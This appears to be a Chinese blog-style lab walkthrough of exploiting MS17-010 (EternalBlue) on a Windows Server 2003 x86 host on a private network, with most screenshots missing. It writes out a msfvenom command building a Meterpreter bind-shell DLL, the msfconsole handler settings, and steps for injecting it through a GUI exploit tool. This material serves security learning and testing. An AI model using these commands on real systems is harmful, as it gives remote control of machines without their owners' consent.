抄个冷板凳---x86架构MS-17010漏洞的多重利用方法-Windows 7 家庭版6.1(7601) — 192.168.50.

时间:2024-04-12 20:36:22

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
没有发现17010相关漏洞
在这里插入图片描述
在这里插入图片描述
最后针对windows server 2003 sp2 x86的实验目标,演示一下abc123表哥的神器,解放双手
在这里插入图片描述
使用正向payload设置x86.dll 小马

msfvenom -p windows/meterpreter/bind_tcp LPORT=1003 -f dll > x86.dll

在这里插入图片描述
使用msfconsole正向监听

use exploit/multi/handler 
set payload windows/meterpreter/bind_tcp
set lport 1003
set rhost 192.168.50.205
run

在这里插入图片描述
将生成的x86.dll文件存放在图形化工具的根目录下,并将原有的x86.dll重命名
在这里插入图片描述
先点击生成bin,而后点击漏洞利用,最后点击dll注入
在这里插入图片描述
攻击成功后,发现msf上线
在这里插入图片描述